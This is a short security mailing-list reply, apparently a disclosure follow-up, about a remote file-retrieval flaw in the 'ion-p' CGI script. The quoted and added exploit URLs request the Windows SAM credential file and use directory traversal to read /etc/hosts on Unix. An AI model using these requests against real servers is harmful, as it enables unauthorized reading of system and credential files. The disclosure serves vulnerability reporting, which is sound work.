Re: ion-p.exe allows Remote File Retrieving

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

Hi,

> ion-p.exe allows Remote File Retrieving
>
> www.Server.com/cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
>

The 'ion-p' *NIX version is also vulnerable.  Directory traversal chars can be used, too:

/cgi-bin/ion-p?page=../../../../../etc/hosts 


Bye,

Stuart


-- 
Stuart Moore
SecurityTracker.com
SecurityGlobal.net LLC
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux